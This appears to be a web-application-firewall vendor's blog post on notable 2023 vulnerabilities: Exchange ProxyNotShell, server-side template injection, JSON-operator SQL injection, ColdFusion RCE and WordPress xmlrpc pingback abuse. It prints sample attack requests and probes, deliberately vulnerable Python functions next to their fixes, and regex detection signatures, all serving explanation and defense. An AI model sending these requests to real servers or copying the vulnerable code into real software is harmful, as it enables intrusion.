Major Vulnerabilities and Signature Pattern Response in 2023
1. Overview :
MONITORAPP's web application firewall blocks attacks on web applications by combining several detection technologies. Among them, regularly updated signature patterns are the component that identifies known attacks and blocks them quickly: because the patterns are predefined, a match can be acted on immediately, which keeps web applications available and their data intact.
The security landscape keeps evolving and more sophisticated threats keep emerging, so a move toward proactive security is inevitable. Traditional signature patterns nevertheless remain a core security element. They are highly reliable, detect known attacks robustly, and still carry much of the detection load in current security strategies.
To address both known and unknown threats, intelligent technologies such as artificial intelligence and big-data analysis should be combined with the stability that signature patterns provide. The two complement each other: signatures catch what is already known with precision, and the analytic methods cover what no signature yet describes.
In 2023, the threat analysis team investigated the vulnerabilities that stood out among the cyber threats reported worldwide and produced signatures for a swift and effective response. The major vulnerabilities that drew attention this year are listed below.
2. Major Vulnerabilities in 2023 :
2-1) MS Exchange Server Vulnerability: an authenticated but low-privileged user reaches the Exchange Remote PowerShell endpoint through the front-end by one of several request paths and uses it to upload and execute a WebShell.
CVE-2022-41080 (SSRF): the vulnerability is triggered while the Front-End (HTTP Proxy) process interprets the attacker's request, which lets the request be forwarded to the back-end.
CVE-2022-41082 (RCE): the vulnerability is triggered when the Back-End (Remote PowerShell) process deserializes the attacker's payload.
Sample Attack Syntax and Detection
POST /autodiscover/admin@localhost/powershell/autodiscover.json?x=a HTTP/1.1
Authorization: Basic cG9jdXNlcjpwb2NwYXNzd29yZA==
Content-Length: 1821
Content-Type: application/soap+xml;charset=utf-8
Host: www.sample.com
User-Agent: HTTPie
<s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:a="http://schemas.xmlsoap.org/ws/2004/08/addressing" xmlns:w="http://schemas.dmtf.org/wbem/wsman/1/wsman.xsd" xmlns:p="http://schemas.microsoft.com/wbem/wsman/1/wsman.xsd">
<s:Header>
<a:To>https://exchange16.domaincorp.com:443/PowerShell?PSVersion=5.1.19041.610</a:To>
<w:ResourceURI s:mustUnderstand="true">http://schemas.microsoft.com/powershell/Microsoft.Exchange</w:ResourceURI>
<a:ReplyTo>
<a:Address s:mustUnderstand="true">http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous</a:Address>
</a:ReplyTo>
<a:Action s:mustUnderstand="true">http://schemas.xmlsoap.org/ws/2004/09/transfer/Create</a:Action>
<w:MaxEnvelopeSize s:mustUnderstand="true">512000</w:MaxEnvelopeSize>
<a:MessageID>uuid:{MessageID}</a:MessageID>
<w:Locale xml:lang="en-US" s:mustUnderstand="false" />
<p:DataLocale xml:lang="en-US" s:mustUnderstand="false" />
<p:SessionId s:mustUnderstand="false">uuid:ddedca29-086e-4053-a983-0e00fa367968</p:SessionId>
<p:OperationID s:mustUnderstand="false">uuid:4bbdc4fa-7040-4697-93f3-179f7108c8e8</p:OperationID>
<p:SequenceId s:mustUnderstand="false">1</p:SequenceId>
<w:OptionSet xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" s:mustUnderstand="true">
<w:Option Name="protocolversion" MustComply="true">2.3</w:Option>
</w:OptionSet>
<w:OperationTimeout>PT180.000S</w:OperationTimeout>
</s:Header>
<s:Body>
<rsp:Shell xmlns:rsp="http://schemas.microsoft.com/wbem/wsman/1/windows/shell" Name="WinRM10" >
<rsp:InputStreams>stdin pr</rsp:InputStreams>
<rsp:OutputStreams>stdout</rsp:OutputStreams>
<creationXml xmlns="http://schemas.microsoft.com/powershell">AAAAAAAAAAAAAASASDASDASASDSFASFASFDFADSKLJlkjlkjKLJSL...</creationXml>
</rsp:Shell>
</s:Body>
</s:Envelope>
2-2) Server Side Template Injection: a vulnerability in which malicious template syntax is inserted into the template engine used by the web application and is evaluated by the engine.
Method to confirm the template engine: send injection probes written in the syntax of each candidate engine (for example {{7*7}} or ${7*7}) and check whether the response contains the evaluated result rather than the literal probe; the engine that evaluates the probe is the one in use.
Sample Attack Syntax and Detection
POST /test HTTP/1.1
Host: www.sample.com
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)
Accept-Encoding: gzip, deflate
Detection condition: Query/Payload Length >= 10
Example
id=${{ "7"*7 }}&password=example
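The following Python example is added here for illustration and is not MONITORAPP's code. Because a real template engine cannot be assumed to be installed, render_template is a deliberately minimal stand-in that evaluates {{ ... }} expressions the way an engine such as Jinja2 evaluates its own expression language; the functions greet_vulnerable and greet_safe are hypothetical application code. It shows why the probe above is evaluated when the request parameter is spliced into the template source, and echoed back literally when it is passed as template data, and it includes the check used to confirm that an engine evaluated a probe.

```python
import re

# Stand-in for a template engine: every {{ expr }} in the template *source* is
# evaluated.  Real engines (Jinja2, Twig, FreeMarker, ...) do the same with
# their own expression language; this toy exists only so the example runs offline.
EXPR = re.compile(r"\{\{\s*(.*?)\s*\}\}")


def render_template(source: str, **context) -> str:
    def evaluate(match: re.Match) -> str:
        # When *source* is built from the request, this evaluates attacker text.
        return str(eval(match.group(1), {"__builtins__": {}}, dict(context)))
    return EXPR.sub(evaluate, source)


def greet_vulnerable(user_id: str) -> str:
    # BUG: the request parameter becomes part of the template source, so a
    # probe such as ${{ "7"*7 }} is parsed and evaluated by the engine.
    return render_template("Welcome, " + user_id + "!")


def greet_safe(user_id: str) -> str:
    # FIX: the template source is a constant; the parameter arrives as data
    # through the context and is never parsed as template syntax.
    return render_template("Welcome, {{ name }}!", name=user_id)


def probe_evaluated(probe_expr: str, response: str) -> bool:
    """Engine-confirmation check: the engine evaluated the probe if the response
    carries the computed value and no longer carries the probe's literal text."""
    expected = str(eval(probe_expr, {"__builtins__": {}}, {}))
    return expected in response and probe_expr not in response


if __name__ == "__main__":
    PROBE = '${{ "7"*7 }}'          # the sample payload from the page
    print(greet_vulnerable(PROBE))  # Welcome, $7777777!
    print(greet_safe(PROBE))        # Welcome, ${{ "7"*7 }}!
```

The leading $ in the page's probe is what makes it a useful polyglot: an engine using ${ } syntax evaluates the outer form, one using {{ }} evaluates the inner form, and the 7777777 (string repetition) versus 49 (numeric multiplication) result separates engines that share the same delimiters.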
2-3) JSON Operator SQL Injection: SQL injection that exploits the JSON-related operators or functions that the various DBMSs have added.
Support for JSON by DBMS: the JSON functions and operators differ between products (for example json_array_length and json_extract, or the -> and ->> operators of MySQL and PostgreSQL), so the attack is attempted with the syntax of the specific database management system behind the application, and a signature has to cover each of them rather than only the classic SQL keywords.
Sample Attack Syntax and Detection
POST /test HTTP/1.1
Host: www.sample.com
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)
Accept-Encoding: gzip, deflate
Detection condition: Query/Payload Length >= 10
Example
/test?temp=test' or json_array_length({}) <= 3
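The example below is added here and is not MONITORAPP's code. It uses Python's built-in sqlite3 module, whose json_array_length() function stands in for the JSON functions of the other DBMSs; the users table and its rows are constructed, and the page's probe is completed with a quoted JSON argument and a trailing comment so that it parses as SQLite. It shows the JSON-function tautology succeeding against string-built SQL and failing against a bound parameter, without using any of the keywords (UNION, SLEEP, and so on) that older signatures key on.

```python
import sqlite3

# Probe from the page, completed so that it parses as SQLite: the JSON argument
# is quoted and "-- " swallows the closing quote of the original literal.
# json_array_length('{}') returns 0 (the value is not an array), so 0 <= 3 is
# always true and the WHERE clause matches every row.
PAYLOAD = "test' or json_array_length('{}') <= 3 -- "


def setup_db() -> sqlite3.Connection:
    """In-memory table with constructed rows (example data only)."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT, role TEXT)")
    con.executemany("INSERT INTO users (name, role) VALUES (?, ?)",
                    [("alice", "admin"), ("bob", "user"), ("carol", "user")])
    return con


def lookup_vulnerable(con: sqlite3.Connection, temp: str) -> list[str]:
    # BUG: the parameter is concatenated into the statement; the single quote
    # in the payload ends the literal and the JSON tautology selects every row.
    sql = f"SELECT name FROM users WHERE name = '{temp}'"
    return sorted(row[0] for row in con.execute(sql))


def lookup_safe(con: sqlite3.Connection, temp: str) -> list[str]:
    # FIX: bound parameter; the whole payload is compared as one string value,
    # json_array_length is never parsed as SQL, and nothing matches.
    rows = con.execute("SELECT name FROM users WHERE name = ?", (temp,))
    return sorted(row[0] for row in rows)


if __name__ == "__main__":
    db = setup_db()
    print(lookup_vulnerable(db, PAYLOAD))  # ['alice', 'bob', 'carol']
    print(lookup_safe(db, PAYLOAD))        # []
```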
2-4) Adobe ColdFusion RCE: remote code execution caused by an unsafe deserialization vulnerability in the Adobe ColdFusion product.
Vulnerability Attack: the attacker first plants a malicious Java class file at a known location on the server, then triggers its loading and execution by requesting a CFC endpoint with the file's path supplied as the classname in the _metadata of the request.
Sample Attack Syntax and Detection
POST /testing.cfc?method=foo&_cfclient=true HTTP/1.1
Accept: */*
Connection: close
Content-Length: 112
Content-Type: application/x-www-form-urlencoded
Host: 10.0.0.225:8080
User-Agent: HTTPie
_variables={"_metadata":{"classname":"\..\runtime\work\Catalina\localhost\tmp\hax.tmp"}, "_variables":{}}
2-5) WordPress xmlrpc.php: vulnerabilities arising from pingback and brute-force attacks through WordPress's xmlrpc.php.
pingback: the pingback.ping method makes the WordPress server send a request to the URL given as the pingback source, so an attacker first uses it to check which ports on a target are open and then abuses it for DoS attacks against that target.
brute-force: indiscriminate login attempts or password guessing through the XML-RPC interface instead of the login form.
Sample Attack Syntax and Detection
POST /xmlrpc.php HTTP/1.1
Content-Length: 258
Content-Type: application/xml; charset=utf-8
Host: xxx.com
User-Agent: HTTPie
<?xml version="1.0" encoding="iso-8859-1"?><methodCall><methodName>pingback.ping</methodName><params><param><value><string>https://victim.com</string></value></param><param><value><string>http://xxx/sample-page/</string></value></param></params></methodCall>
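The Python example below is added here to show how signature patterns of the kind described in sections 2-1 to 2-5 are applied to a raw request; it is not MONITORAPP's engine and the five rules are not its real signature set. The rules are illustrative regular expressions written from the sample requests on this page, and the requests in SAMPLES are constructed, shortened copies of those samples plus one benign request. The min_len field implements the "Query/Payload Length >= 10" condition from the SSTI and JSON-operator entries.

```python
import re
from dataclasses import dataclass
from typing import Optional
from urllib.parse import unquote_plus


@dataclass
class Request:
    method: str
    target: str
    headers: dict
    body: str


def parse_request(raw: str) -> Request:
    """Minimal HTTP/1.1 request parser; accepts CRLF or LF line endings."""
    head, _, body = raw.replace("\r\n", "\n").partition("\n\n")
    lines = head.splitlines()
    method, target, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return Request(method, target, headers, body)


def param_values(req: Request) -> list[str]:
    """Percent-decoded values of query-string and form-body parameters."""
    sources = [req.target.partition("?")[2]]
    if "application/x-www-form-urlencoded" in req.headers.get("content-type", ""):
        sources.append(req.body)
    return [unquote_plus(pair.partition("=")[2])
            for src in sources for pair in src.split("&") if pair]


@dataclass
class Rule:
    name: str
    path: Optional[re.Pattern] = None   # against the request-target (path + query)
    body: Optional[re.Pattern] = None   # against the percent-decoded body
    param: Optional[re.Pattern] = None  # against each decoded parameter value
    min_len: int = 0                    # the page's "Query/Payload Length >= 10"


RULES = [
    # 2-1: front-end path that reaches the Remote PowerShell back-end, combined
    # with the WS-Management ResourceURI that a PowerShell session request carries
    Rule("exchange-powershell-backend",
         path=re.compile(r"^/autodiscover/[^/]+@[^/]+/powershell/", re.I),
         body=re.compile(r"schemas\.microsoft\.com/powershell/Microsoft\.Exchange")),
    # 2-2: template expression delimiters inside a sufficiently long parameter value
    Rule("ssti-probe", param=re.compile(r"\{\{.*?\}\}|\$\{.*?\}|<%.*?%>"), min_len=10),
    # 2-3: quote break-out followed by a JSON function or JSON operator
    Rule("json-operator-sqli", min_len=10,
         param=re.compile(r"['\"]\s*(or|and)\b.*?(json_\w+\s*\(|->>?|#>>?)", re.I | re.S)),
    # 2-4: _cfclient request whose _metadata.classname walks out of its directory
    Rule("coldfusion-cfc-classname-traversal",
         path=re.compile(r"[?&]_cfclient=true\b", re.I),
         body=re.compile(r"_metadata.*?classname.*?(\.\./|\.\.\\)", re.S)),
    # 2-5: XML-RPC pingback.ping call
    Rule("wp-xmlrpc-pingback",
         path=re.compile(r"/xmlrpc\.php(\?|$)", re.I),
         body=re.compile(r"<methodName>\s*pingback\.ping\s*</methodName>")),
]


def matches(rule: Rule, req: Request) -> bool:
    if rule.path and not rule.path.search(req.target):
        return False
    if rule.body and not rule.body.search(unquote_plus(req.body)):
        return False
    if rule.param and not any(len(v) >= rule.min_len and rule.param.search(v)
                              for v in param_values(req)):
        return False
    return True


def scan(raw: str) -> list[str]:
    """Names of every rule the raw request triggers (empty list = pass)."""
    req = parse_request(raw)
    return [rule.name for rule in RULES if matches(rule, req)]


# Constructed, shortened copies of the page's sample requests plus a benign one.
SAMPLES = {
    "exchange": "POST /autodiscover/admin@localhost/powershell/autodiscover.json?x=a HTTP/1.1\n"
                "Host: www.sample.com\nContent-Type: application/soap+xml;charset=utf-8\n\n"
                '<s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope"><s:Header>'
                "<w:ResourceURI>http://schemas.microsoft.com/powershell/Microsoft.Exchange"
                "</w:ResourceURI></s:Header><s:Body/></s:Envelope>",
    "ssti": "POST /test HTTP/1.1\nHost: www.sample.com\n"
            "Content-Type: application/x-www-form-urlencoded\n\n"
            'id=${{ "7"*7 }}&password=example',
    "json_sqli": "GET /test?temp=test%27%20or%20json_array_length(%7B%7D)%20%3C=%203 HTTP/1.1\n"
                 "Host: www.sample.com\n\n",
    "coldfusion": "POST /testing.cfc?method=foo&_cfclient=true HTTP/1.1\nHost: 10.0.0.225:8080\n"
                  "Content-Type: application/x-www-form-urlencoded\n\n"
                  r'_variables={"_metadata":{"classname":"\..\runtime\work\Catalina\localhost'
                  r'\tmp\hax.tmp"},"_variables":{}}',
    "pingback": "POST /xmlrpc.php HTTP/1.1\nHost: xxx.com\nContent-Type: application/xml\n\n"
                '<?xml version="1.0"?><methodCall><methodName>pingback.ping</methodName>'
                "<params><param><value><string>https://victim.com</string></value></param>"
                "<param><value><string>http://xxx/sample-page/</string></value></param>"
                "</params></methodCall>",
    "benign": "GET /index.html?page=2 HTTP/1.1\nHost: www.sample.com\n\n",
}

if __name__ == "__main__":
    for name, raw in SAMPLES.items():
        print(f"{name:>10}: {scan(raw)}")
```

Two design points carry over to real signatures: the Exchange rule requires both the front-end path and the back-end ResourceURI, so a stray request to the path alone does not fire it, and the length threshold on the SSTI and JSON rules keeps short, legitimate values such as {{7}} from matching while the page's 12-character and 34-character probes still do.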
3. Reference
- https://nsfocusglobal.com/exchange-server-owassrf-vulnerability-cve-2022-41080-cve-2022-41082-alert/
- https://github.com/ohnonoyesyes/CVE-2022-41080
- https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-41082
- https://www.exploit-db.com/exploits/46386
- https://www.opencve.io/cve/CVE-2019-8341
- https://www.bleepingcomputer.com/news/security/hackers-breach-us-govt-agencies-using-adobe-coldfusion-xploit/
- https://www.cisa.gov/news-events/alerts/2023/12/05/cisa-releases-advisory-threat-actors-exploiting-cve-2023-26360-vulnerability-adobe-coldfusion
- https://www.picussecurity.com/resource/blog/cve-2023-26360-adobe-coldfusion-servers-exploited-for-initial-access
- https://www.exploit-db.com/exploits/43829
- https://github.com/nth347/CVE-2020-28032_PoC